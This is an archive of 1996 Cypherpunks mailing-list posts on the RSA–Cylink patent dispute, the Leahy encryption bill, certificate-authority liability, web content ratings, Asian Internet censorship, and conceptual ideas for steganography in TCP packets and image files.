iQB1AwUBMUB7v+VevBgtmhnpAQHKXwMAhcjT3R6hE8jtGBEY3uHZ7Y3cOycQEpXP
dSQ2TsK27vYpCCjFBe3JauxLBBpM6yPqhPq8rSerNaQ7a8lhAWB4UwcUTwh9S7U3
PobslFhkFEwPd9jnZwY4g0ZZKb3iABIO
=sLrM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Sat, 9 Mar 1996 04:02:48 +0800
To: cypherpunks@toad.com
Subject: News on RSA vs. Cylink Injunctions and Patents
Message-ID: <9602088263.AA826308428@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        The following press release from RSA may be of interest to the
folks on this list.
                --Bob
-----------------------------------
Subject: NEWS: Cylink loses in attempt to enjoin RSA licensing

REDWOOD CITY, Calif.--(BUSINESS WIRE)--March 8, 1996--In a ruling filed 
March 4, the Honorable Spencer Williams, U.S. District Court Judge for the 
Northern District of California, denied Cylink Corporation's motion seeking 
an injunction against RSA Data Security, Inc.'s licensing of its 
BSAFE/TIPEM toolkit software.  


Cylink contends that RSA's software infringes its Stanford patents and that 
licensing required an additional grant from Cylink, despite 
the fact that RSA already has a license.  After hearing oral arguments on 
Feb. 29, Judge Williams denied Cylink's motion from the bench and later 
issued a written order explaining that "several factors weigh against 
finding that (Cylink) has shown a likelihood of success on 
the merits."  


In denying the motion the court found that "RSA has raised serious question 
(sic) regarding the validity of the first of the Stanford patents, the 
Diffie-Hellman patent."  With respect to Cylink's other patent, the 
Hellman-Merkle patent, the court had this to say: "(I)t is questionable 
whether the patent warrants such broad coverage."  Thus, Cylink has "failed 
to demonstrate a likelihood of success on the merits."  


RSA had initiated the lawsuit against CKC, a wholly 
owned subsidiary of Cylink, because CKC was threatening RSA's customers in 
an effort to induce them to purchase sublicenses to the Stanford patents.  
RSA's action seeks a court determination that the patents are invalid, not 
infringed and/or RSA's licensing does not exceed its existing rights under 
the patents.  Cylink/CKC responded by filing its motion for preliminary 
injunction which was denied by the court as described above.  


In a related matter, the arbitration panel which is handling the winding up 
and dissolution of Public Key Partners ("PKP"), the entity that formerly 
held the licensing rights to the MIT and Stanford patents, ruled that:  "In 
addition to the claims discussed above and in our prior rulings, Cylink 
presented the claim, but did not prove, that RSA breached its fiduciary 
duty to PKP by providing patent licenses to third parties."  The 
arbitration panel also found that PKP was obligated to reimburse RSA for 
the costs and attorney's fees incurred in other related litigation, 
including a patent lawsuit brought by Cylink to invalidate the MIT patent.  


"The court confirmed that RSA has existing rights to the Stanford patents, 
and although Cylink knew this, it has forced RSA to investigate.  In that 
process, we have found a number of disturbing facts about the Stanford 
patents," said Jim Bidzos, president of RSA. He went on to add: "Cylink's 
losing its motion is likely only a surprise to Cylink who thinks they can 
achieve through the courts what they haven't been able to accomplish in the 
marketplace."  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 9 Mar 1996 00:53:50 +0800
To: cypherpunks@toad.com
Subject: Re: FCC and Internet telephones
Message-ID: <2.2.32.19960308153651.00737d2c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:13 PM 3/7/96 -0500, Thomas J. Sawyer wrote:

>It seems that once again, big business is trying to get in the way of
>progress and competition because they are afriad they are going to lose
>some money.  It seems to me that the ACTA is upset because someone found a
>way to "do it cheaper" and the telco's stand to lose a lot of long distance
>dollars.  So rather then using this technology and perhaps lowering LD
>rates, instead they seek to block out the technology from the public.  

Actually they *are* using the technology -- digital networking.  They are
just keeping the markup.  It costs less that 2 cents a minute to produce a
New York to London call but AT&T charges me more than 50 cents a minute.
That sort of markup can't last.  They need more copetition.  Iphone is just
part of the disintermediation.

DCF  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 9 Mar 1996 00:56:01 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Not a good idea...
In-Reply-To: <199603080546.XAA00397@proust.suba.com>
Message-ID: <Pine.SUN.3.91.960308104119.29952C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Mar 1996, Alex Strasheim wrote:

> I might be stretching things a bit, but couldn't you call a CA a "review
> service"?  Essentially instead of having a banned list, you have an 
>"accepted list". > 

Nice try.  Wish my students were that creative.  I don't think it works,
though, at least when CA's represent that their info is suitable for
relying parties to use in financial transactions (something Siskel & Ebert
do not do!). 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 10 Mar 1996 05:11:48 +0800
To: cypherpunks@toad.com
Subject: SLE_aze
Message-ID: <199603081618.LAA21645@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   3-8-96. FT:  "Asean forum to fight Internet sleaze." 
 
      The Association of South-East Asian Nations agreed 
      yesterday to censor "negative elements" of the Internet. 
      Information ministers are concerned about "information 
      contamination" and agreed on the need for regulation and 
      to learn from each other's experience, particularly from 
      Singapore. 
 
   3-6-96. WSJ: "Singapore Unveils Sweeping Measures To 
   Control Words, Images on Internet." 
 
      Singapore said it will concentrate on individuals or 
      organizations putting content on the Internet and the 
      country's three access providers. Only public forums, or 
      electronic spaces where people can converse or create 
      displays visible to others who journey there, will fall 
      under the regulations. 
 
   3-8-96. TWP: "FBI Advertises for Tips On Spies From 
   Vietnam." 
 
      FBI officials said the advertisements were prompted by 
      an increase in activity by Vietnam's intelligence agents  
      impersonating relatives of Vietnamese Americans to sneak 
      into the country and steal high-technology secrets. 
 
 
   SLE_aze (for 3) 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Mar 1996 20:30:09 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603081054.LAA24235@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Subject: Unproductive punks (was ANTI-CRYPTO CYPHERPUNKS)

anonymous-remailer@shell.portal.com wrote:
> 
> This is the first in a regular series of postings of cypherpunks
> who have joined big brothers fight to deprive you from Unescrowed
> Crypto. Some of these pigs have come out in favor of the new anticrypto
[..]

Fuck you.  This is bullshit FUD.

If you really feel that this bill would make escrow mandatory, do some
work to have the wording fixed rather than attack other people on the
list... 

[..]
> A few megabytes an hour of email from real cypherpunks/patriots

Mailbombing people who don't agree with you will do nothing to
affect the wording or passage of the bill.  (And damned if I'd be
called a "patriot"....)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 8 Mar 1996 20:29:38 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603081057.LAA24365@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Subject: Unproductive punks (was ANTI-CRYPTO CYPHERPUNKS)

anonymous-remailer@shell.portal.com wrote:
> 
> This is the first in a regular series of postings of cypherpunks
> who have joined big brothers fight to deprive you from Unescrowed
> Crypto. Some of these pigs have come out in favor of the new anticrypto
[..]

Fuck you.  This is bullshit FUD.

If you really feel that this bill would make escrow mandatory, do some
work to have the wording fixed rather than attack other people on the
list... 

[..]
> A few megabytes an hour of email from real cypherpunks/patriots

Mailbombing people who don't agree with you will do nothing to
affect the wording or passage of the bill.  (And damned if I'd be
called a "patriot"....)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Weinstein" <djw@vplus.com>
Date: Sat, 9 Mar 1996 06:27:49 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Leahy bill nightmare scenario?
Message-ID: <199603081957.LAA26745@ns1.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Mar 96 at 9:24, you wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At 06:14 AM 3/8/96 GMT, Dan Weinstein wrote:
> >On Wed, 06 Mar 1996 16:59:36 -0800, you wrote:
> >
> >>At that point, Bob is GUILTY of violation of the Leahy bill,
> >>because his encrypted anonymous remailer:
> >>
> >>1.  Uses encryption to thwart message tracing, and thus the
> >>"criminal investigation."
> >>
> >>2.  Bob has already been informed that his system will be used for
> >>illegal purposes; the cops have the messages to prove he has been
> >>told.  He's GUILTY GUILTY GUILTY, he will definitely lose the
> >>system and possibly whatever residence it runs in, and will
> >>probably have to pay a huge fine to boot.
> >
> >This is not my understanding.  I believe that Bob has to be
> >commiting a felony himself before they can get him under the
> >current phrasing.
> 
> Well, first, the section's phrasing is screwed up.  Whether this is
> the fault of VTW, who posted the text, or the original bill I do not
> know.  

I have yet to see the original bill myself, it is not posted on 
Thomas yet, but I too have ready the VTW version.

> Second, if what they're charging is the hindrance of an
> felony investigation, it isn't clear to me why they would be
> limiting the charging of that "crime" to only those actually who
> have committed a felony. (logic isn't the normal mode of thought for
> a government employee, you realize.)  

I agree with your concerns here, but I find it hard to believe that 
the courts would allow a broader interpretation.
 
>  Third, all they have to do is to "suspect" the person of a felony,
>  and a 
> "felony investigation" starts.  That would presumably make him
> guilty of the Leahy bill's provision, regardless of whether he is
> actually participating in the crime supposedly being investigated.

Here you are dead wrong, the bill specifically states: "in furtherance 
of a felony."  Its like those laws that let them charge someone with 
murder in the first if someone dies while you are commiting another 
felony.  They must prove the original felony before they can get you 
on the murder one.  The real purpose of this provision, as I read it, 
is to give longer sentences to criminals that use crypto.
 
> Fourth, I gave what I considered to be a clear example of the
> hypothetical misuse of an encrypted remailer by the cops, one that
> would arguably make the remailer operator guilty of some
> "reasonable" anti-kiddie-porn statute.  At that point, _he_is_ the
> target of the investigation.  Unless you can show that this kind of
> action by the government is impossible, I consider it to be not
> merely possible but almost certain to occur.

Again, the problem I see with your scenario is that I don't believe 
that the courts will interpret it that way.  My interpretation is that 
if they serve a warrent and I don't decrypt for them and they can 
prove a felony, then I will be subject to the listed punishment.


> Fifth, it isn't clear what amount of knowledge is necessary to
> "trigger" this clause, especially in its current flawed state. 
> Since ISP's and encrypted remailers might know, in general, that
> their systems can and probably are being used for SOME criminal
> activity, even if they can't identify it or the user, or decrypt it,
> etc, a broad interpretation of the resulting law could easily
> de-facto prohibit any business practices (i.e., allowing users to
> use encryption) that prevents full-scale monitoring and/or tracing.

I disagree, it states you must "willfully endeavor" to use the 
encryption as a means of obstructing the investigation.  To me, this 
means that it is the motivation for using the encryption.  If I set 
up an encrypting remailer for the purpose of allowing free exchange 
of ideas, I don't believe I would be liable under this law.  The 
only way I could see a remailer charged under this is if he had solid 
evidence that a specific user was violating the law, and took no 
action.
 
> This is only the beginning of the problems with this section.  If
> you can explain why nothing I've described could possibly occur, I
> welcome a contrary explanation.  

I see some real problems too, but I do not see the problems with this 
provision to be enough to condemn the entire bill.  I would like to 
see this portion of the bill ammended to make it clear that only 
those actually involved in commiting the felony would be held 
responsible. 

 
> But I would also ask this:  Why, exactly, do we need this section? 
> We've already been told that the opponents of this bill will fight
> it tooth-and-nail under its current wording; if that's the case then
> the presence of this section is inadequate to appease their
> unhappiness.  Therefore, we shouldn't include it in the bill at all;
> it does no good.
> 
> Any explanations, Dan?

You are talking about the fringe, this, I think, was added as an 
attempt to bring in those that are in the middle.  That is, Those 
that see the need to prevent the use of encryption as a means of 
obstructing justice, but feel that we should also have a right to 
privacy.  To say that there is no delema here is ridiculous, crime is 
a serious problem that we are already having a terrible time dealing 
with.  I think Leahy realizes that this provision will be about as 
useful as the "use a gun, go to jail" laws, but wants to give those 
in the middle to say that they bill will help prevent crime.
 
> BTW, I'm not the source of those recent anonymous notes on
> Cypherpunks criticizing you for the support of this bill.  As you by
> now have guessed, I'm not at all reticent about standing up and
> being counted and identified.
> 
> Jim Bell
> jimbell@pacifier.com
> 
> Klaatu Burada Nikto

Good movie.

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Sat, 9 Mar 1996 06:53:36 +0800
To: cypherpunks@toad.com
Subject: Re: TCP/IP Stego (was CU-SeeMe)
Message-ID: <v02140b02ad65d5e2efc9@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain



JonWeinke@aol.com writes:
>
>>     -It can be applied by two routers which are in the middle
>>         of the connection.
[...]
>
>You seem to be oblivious to the fact that this technique is only useful for
>ISP's, corporate networks, etc. that the average home computer user will
>never have access to.

I know that, I was just pointing out advantages you overlooked.  I guess
that the fact that I probably know more ISP operators and techs then
non-geeks who use the net made this part more obvious to me.  The original
technique of doing stego on packets is still valid, and by adding it in
to a WinSock lib or linux tcp/ip implementation the user can send hidden
messages just by connecting to a friendly stego-enhanced web server out
on the net and doing some casual browsing.

The difference between the two methods is, as I said before, exactly
the same as the difference between TCP/IP and UUCP.  Hiding info in
images or sound files works fine for "email" or file storage but has
no chance of being an interactive protocol, sometimes you need to
get things done in real-time.

> If I want to send a WAV file of my 2 year old son
>saying "Hi, gramma" (or a 24-bit color TIFF of him practicing nose-picking
>techniques) to my relatives, that is not overtly suspicious behavior, even if
>it has a slight amount of background noise (or graininess).

But your relatives are not the people who you need to communicate secrets
with securely.  These gross stego hacks to sound and image files are best
used to make postings to various binary Usenet newsgroups.  Broadcast the
message and then put it in a place where many people will download it
but only a few will know that it contains the hidden info.  Sending this
stuff via email is just begging for traffic analysis at the very least...

>As long as I
>don't stego too many bits in the file, and I strip out any overt "I'm crypto"
>headers, it will be impossible to prove that stego techniques were used on a
>file.  Finding random bits where random bits normally live cannot be used to
>prove anything.

Provided the bits are random in the way that they should be... The low-order
bits in such files were chosen by implementors of stego programs because
modification would not be noticed by the person viewing or listening to
the file, not necessarily because there was actually randomness at this
level which could be replaced.  Does anyone know of a survey of images or
sound files which tested the statistical randomness of these bits?  They
may not be as random as people think they are.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 9 Mar 1996 03:13:19 +0800
To: cypherpunks@toad.com
Subject: Re: LACC: TER_ror
In-Reply-To: <wEv0bcA+lEQxEwbk@crecon.demon.co.uk>
Message-ID: <0lE76iC00YUuEF0aIr@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bruce Tober is a generally good guy, but on copyright issues he's a
one-man net-police-bureau, filtering through various mailing lists for
suspected violations.

Bruce has a history of calling those whom he suspects misuse copyrighted
materials "copyright thieves" -- a term that I love, since it's so close
to the Church of Scientology's label of "copyright terrorists."

Sign me,

Declan McCullagh
Copyright Terrorist


Excerpts from internet.cypherpunks: 8-Mar-96 Re: LACC: TER_ror by T
Bruce Tober@crecon.dem 
> In message <199603080259.VAA05749@pipe2.nyc.pipeline.com>, John Young
> <jya@pipeline.com> writes
> >   The Economist, March 2, 1996, pp. 23-25. 
>  
> With whose permission are you posting this copyrighted material?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Henry Huang <hwh6k@fulton.seas.virginia.edu>
Date: Sat, 9 Mar 1996 04:34:18 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <199603081753.MAA65714@fulton.seas.Virginia.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 7, 22:29, Timothy C. May wrote:
> At 2:38 AM 3/8/96, Bill Frantz wrote:
> >At  6:59 PM 3/7/96 -0800, Timothy C. May wrote:
> >>If SurfWatch can be sued for a "bad review," then Siskel and Ebert had
> >>better find a new line of work.
> >
> >As long as a reviewer corrects errors, as SurfWatch seems to be willing to
> >do, I think they are relativly suit-proof.  If they don't, well - anyone
> >can be sued for anything.  I'll let the lawyers comment on the possibility
> >of success.
>
> My point was that "opinions" (such as movie reviews) are not "tortable"
> (don't know the legal name), unless specific inaccuracies can be
> demonstrated, and even then it is hard. Siskel and Ebert have undoubtedly
> destroyed the box office prospects of many a movie with their "thumbs down"
> diss of death, but I know of no successful (or even adjudicated) lawsuits
> on this basis.

Thanks for the clarification.  However, this line of argument applies
only to "third-party" ratings systems.  Right now, Microsoft/RSAC/SurfWatch
and SafeSurf/Cybersitter/etc. are setting up competing standards which would
essentially force people to "self-rate" their own sites, or else be blocked
out by browsers configured to reject unrated sites (a feature Microsoft plans
to add to its Internet Explorer).

The question I have is if these systems were widely implemented, could
an Web page author or provider of content be sued for "mislabeling"
their page?  If so, under what circumstances?  Could the RSAC attach
legal requirements to the use of their system, and open up such a
loophole (similar to how Sun attaches conditions to the use of its
"Java" logo)?

If it's possible, the implications of this are pretty dire.  The RSAC
itself reports that many retailers refuse to stock software that's not
labeled according to their standards.  If Web sites were similarly
coerced into not only labeling their pages, but abiding by any arbitrary
conditions attached to *use* of those standards, things could get pretty
ugly.  Hell, who needs the Gov't when industry can censor more efficiently?

-H





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Mon, 11 Mar 1996 10:23:20 +0800
To: cypherpunks@toad.com
Subject: Re: TCP/IP Stego (was CU-SeeMe)
Message-ID: <199603082056.MAA20781@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 PM 3/8/96 -0800, Jim McCoy wrote:
>... The original
>technique of doing stego on packets is still valid, and by adding it in
>to a WinSock lib or linux tcp/ip implementation the user can send hidden
>messages just by connecting to a friendly stego-enhanced web server out
>on the net and doing some casual browsing.

If you can hack your TCP implementation, you should be able (with a high
probability) stego information in a few bits of the TCP checksum by
adjusting the packet boundries of the TCP stream.  An error correcting code
protocol would cover the cases where you couldn't get that *%$# bit set
correctly.  Please note that this technique would not result in TCP
checksum errors.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sat, 9 Mar 1996 07:46:29 +0800
To: froomkin@law.miami.edu (Michael Froomkin)
Subject: Re: Not a good idea...
In-Reply-To: <Pine.SUN.3.91.960308104119.29952C-100000@viper.law.miami.edu>
Message-ID: <199603081914.NAA02963@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Nice try.  Wish my students were that creative.  I don't think it works,
> though, at least when CA's represent that their info is suitable for
> relying parties to use in financial transactions (something Siskel & Ebert
> do not do!).

(Sorry, this ends up rambling way off topic at the end... it turns into a 
rant about preinstalled CAs.)

But when did they make that representation?  Is such a representation
inherent in every CA?  If it is, doesn't that imply that the only reason
for a CA to exist is to provide trust for financial transactions?  It's 
clear (to me, at least) that there are other uses for a CA.

Netscape has represented its products as suitible for commerce, and it
doesn't seem unreasonable to argue that this representation gives
customers and banks an expectation that a certificate from a preinstalled 
CA confers a degree of trustworthiness on the cert holder.

But a CA that doesn't come pre-installed shouldn't be viewed as having
made any implied representations at all.  If a CA controls the
distribution of its key by asserting a copyright, and if it requires
everyone who downloads it to click on a form that says they've read and
understand what a cert from that CA means, then that's what it should 
mean.

Suppose I run a Netscape Commerce server, and I set up a secure forms
processing service.  Anyone can anonymously pay me to set up a perl script
on my SSL server to accept their form data.  My script will take the data,
encrypt it with PGP, and then mail to whatever email address my customer
(the web page owner) has specified. 

Who's liable?  Me, Verisign, or Netscape?  All of us?  

I suspect that if I pass credit card numbers to thieves I'll get in
trouble, but I don't have any assets.

Verisign didn't make any representations directly to the public, and they 
probably followed the procedure they negotiated with Netscape when they 
issued me my cert.

Netscape put together a complicated high-tech system and told the public
(which doesn't understand cryptography) that their system was suitible for
commerce -- it's even in the product's name!  They didn't build in prudent
safeguards to prevent me from running my forms processing service, which
is such a trivial thing to set up that it should have been forseen.  (Q:
I've never gotten a real cert -- do I have to agree to something that
would prohibit my forms processing business?)

(Could a lawyer asking a jury for a judgment against Netscape show them 
the picture of Andressen from the cover of Time, the one where he's 
sitting on a throne, hubris personnified?)

It seems to me that the claims of commerceworthiness, preinstalling CAs,
and the like are going to turn out to be bad for everyone.  

They're bad for Netscape because they exposes them to liability
unneccessarily.  Why should they say their products are suitible for
commerce when they can instead say that they encrypt the traffic using
what are believed to be strong algorithms?  Everyone will make the jump
from that to commerceworthiness on their own.  

What does commerceworthiness mean, anyway?  Transcations up to $1,000? 
$1,000,000?  Remember that SSL web tools are begining to function more and
more as front ends of other kidns of progrms -- there's more at stake here
than credit card numbers typed into forms for consumer purchases.

Preinstalling CAs is great if you want to relieve users of the necessity
of deciding for themselves who they should trust.  You, or a system that
you designed, will make those hard decisions for them.  But it's not so
great if you don't want to be held accountable for almost every single
decision regarding trust on the web.

It's also bad for those of us who want to see crypto widely deployed on
the net.  Solid free code exists, but the cost of licensing the patents
and buying certs is keeping crypto expensive and slowing deployment. 
Preinstalling CAs means that a would be commerce server operator has to
buy a cert or operate from a competitive disadvantage.  It's a significant
cost -- the cert is more expensive than the RSA licence.  It costs as much
as a Fast Track server.  

The patents will go away.  When that happens, the only thing preventing
totally free crypto will be the cost of the certs.  I suspect that
Netscape started thinking about the CA system, they were selling SSL
servers for around $2,000.  A $300 cert isn't such a big thing in those
circumstances -- there's not much of a marginal difference between $2,000
and $2,300.  But now the price of a server is only 15% of that $2,000, and
the price of the cert looks awfully high.  What will it look like when SSL
web servers are free? 

Finally, it's bad for consumers.  Apart from the obvious observation that
the cost of the certs will get passed on to consumers, it's important to
note that it costs money to have someone else decide who you should trust. 
The quality of that decision making affects its cost, and it should be the
marketplace, not a handful of corporate managers, that determines where
the optimum price/quality point is.  Different customers ought to 
be able to make different choices depending on their needs.  

That choice is possible now in an abolute sense, but managing CAs will be
confusing for users, and Netscape's preferential treatment of certain CAs
will clearly hinder open competition among CAs.  It will also tend to
impose an unnatural homogenity on users who have different security needs. 
A guy who never buys anything online but wants to be able to browse web
pages without his ISP knowing what he's looking at has different security
needs from another person who does most of his shopping on the web. 

Security *is* economics, and it's important to keep the floor as low as 
possible.  The current CA system is one of the main things keeping the 
floor higher than it ought to be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 9 Mar 1996 04:40:23 +0800
To: cypherpunks@toad.com
Subject: Can you say "market opportunity"?
Message-ID: <v02120d1bad6627fd2c7d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


I knew you could...

Cheers,
Bob

--- begin forwarded text

Comments: Authenticated sender is <bigmac@digicash.com>
From: "Marcel van der Peijl" <bigmac@digicash.com>
Organization: DigiCash bv
To: ecash@digicash.com
Date: Fri, 8 Mar 1996 16:09:26 +0100
Subject: MT ecash censoring?
Priority: normal
Sender: owner-ecash@digicash.com
Precedence: bulk

I would like to state here that the policy of Mark Twain Bank on
what merchants can or can not sell with ecash is NOT the official
policy of DigiCash. We can not and do not force our banking
licensees any restrictions on the kind of material they sell. On the
other hand, we can also not forbid them to put restrictions on that.

There are laws that require MT to comply with local (St. Louis MO
USA) regulations even when things being sold are acceptible in both
the merchant's and the buyer's country. I don't know for sure if
this is relevant in this specific case, and I would also like to
hear a comment from Mark Twain at this moment. We do not know their
exact policy.


// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "Sacred cows make the best hamburger." -- Mark Twain

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 11 Mar 1996 00:41:11 +0800
To: JonWienke@aol.com
Subject: Re: steganographic trick
In-Reply-To: <960308040205_240667097@emout04.mail.aol.com>
Message-ID: <199603082130.NAA26560@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> given one key, it decrypts into one set of data, and given
>>another key, it decrypts into another set of data.
>
>The only computationally feasible way to accomplish this would be to use a
>variation of the one time pad (OTP) cipher, and use two keys:  the genuine
>key, which is made by the random number generator of your choice, and a
>specially cooked key generated by XORing the encrypted message with an
>innocuous message.  Decrypting with the random key will yield the real
>message, and decrypting with the cooked key will yield the innocuous message.
> The disadvantage to this system is that each key will be the same length as
>the message.

I don't agree that this is the only way to accomplish the problem I proposed.
I gave a scheme that is not equivalent to the one you state. you seem
not to address my actual technical description, although I admit it requires
a bit of inference on the part of the reader.

in the scheme I proposed, P1 and P2 are the two keys. an XOR or OTP
system has nothing to do with what I described.

one problem you do remind me of is that P1 and P2 are going to be
hard to "remember". of course the way PGP handles this is a pass
phrase that unlocks the encrypted key using the IDEA cipher. another
interesting approach would be to use a hash of the passphrase as
a random seed in the process to get the prime number. in other words,
the passphrase is the seed to the algorithm that hunts for the prime
number starting at some random location, and if fed the same seed
(the hash of the passphase) it will again find the same prime number....

>The method you propose (using multiple RSA keys) is not workable.  Finding 2
>RSA keys that will decrypt a given ciphertext block to any 2 meaningful
>plaintexts is at least as difficult as breaking RSA, and expanding this
>concept to messages longer than 1 block moves it into the realm of
>impossibility.

I believe you have misunderstood my description. I gave a feasible system.
I don't know precisely what you mean by "multiple RSA keys". my system
did not have any aspect of public key crypto to it. it is a single
key cipher.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sasha1@netcom.com (Alexander Chislenko)
Date: Sat, 9 Mar 1996 11:09:36 +0800
To: cypherpunks@toad.com
Subject: Review Litigation
Message-ID: <199603082133.NAA28415@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


 What if somebody gets a positive review they do not deserve, or has incorrect
data?  Can somebody file a "public against reviewer" lawsuit?  Who would
collect damages (public, competitors)?

-----------------------------------------------------------
| Alexander Chislenko | sasha1@netcom.com | Cambridge, MA | 
| Home page:  http://www.lucifer.com/~sasha/home.html     |
-----------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 9 Mar 1996 23:00:28 +0800
To: cypherpunks@toad.com
Subject: rhetorical trickery
Message-ID: <199603082153.NAA28521@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I noticed a rhetorical trick/trap that I've seen a lot lately, in the
recent article posted about Phil Zimmermann.

there is an infamous case of a child pornographer or pedophile in
California that is sometimes cited by law enforcement representatives
as a good example of the evils of encryption: supposedly he encrypted
his diary and it couldn't be unlocked by them. this was mentioned in
the article.

but I have a question: how did they know it was his diary?

I've noticed that people tend to often make conceptual leaps like
this that are wholly unjustified. it is easy to get their opposition
to bite down on the trap, when they start arguing about things like
"well, everyone should be free to encrypt whatever they like".

the next time you run into someone using arguments with words like
"criminals" in it, ask them, "how do you know they are criminals"?
when you use their terminology, and argue in terms of it, you have
almost already lost the argument.

there is a big mindset in law enforcement to see "suspects"
as "criminals".  but that is mistaking means and ends. the process
identifies criminals in the end, after a trial, but at no prior
date.

here's another example: I was watching a talk show in which the
recent Israeli bombing was discussed by a bunch of very obviously
frenzied commentators who were calling for Arafat's head on a stick.
one of them insisted that our government had given the names of
the involved terrorists to Arafat some time ago and that he did nothing.

well, the question is: how do we know those names on the list are
the actual terrorists? how do we know Arafat did nothing?

but the other commentators were totally lost this basic rhetorical trap.
they said, "well, assuming what you say is true, then... blah blah".
but the obvious question is, "how do we know these names mean anything"?

there is an amazing tendency in our culture in elsewhere not to 
question authority. when we see some law enforcement agent at a 
press conference, and they talk about "criminals", the press 
immediately latches onto the terminology and asks things like "when
will they be caught"? etc. instead of, "how do you know they are
culpable?"

in crypto arguments as well where there is a lot of emotional 
rhetoric, I have noticed people have a tendency to try to debunk
things that require no debunking, such as the FUD that has been
sown over that infamous CA pedophile.  the test is avoiding
tricky rhetorical traps. there are some battles that don't need
to be fought. just remember that calm, deadly retort whenever
you hear someone getting excited, and ask them, "how do you know
they are his diaries?"







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: T Bruce Tober <octobersdad@crecon.demon.co.uk>
Date: Sat, 9 Mar 1996 04:42:51 +0800
To: nobody@mail.uu.net
Subject: Re: LACC: TER_ror
In-Reply-To: <199603080259.VAA05749@pipe2.nyc.pipeline.com>
Message-ID: <wEv0bcA+lEQxEwbk@crecon.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <199603080259.VAA05749@pipe2.nyc.pipeline.com>, John Young
<jya@pipeline.com> writes
>   The Economist, March 2, 1996, pp. 23-25. 

With whose permission are you posting this copyrighted material?




tbt
--
| Bruce Tober - octobersdad@crecon.demon.co.uk - B'ham, Eng      |
| pgp key ID 0x9E014CE9, "Fear of corrupting the mind of the     |
| younger generation is the loftiest form of cowardice,"         |
| The US Congress and President are guilty as hell of such.      |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 9 Mar 1996 12:10:13 +0800
To: cypherpunks@toad.com
Subject: Re: SurfWatch
Message-ID: <199603082252.OAA03409@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


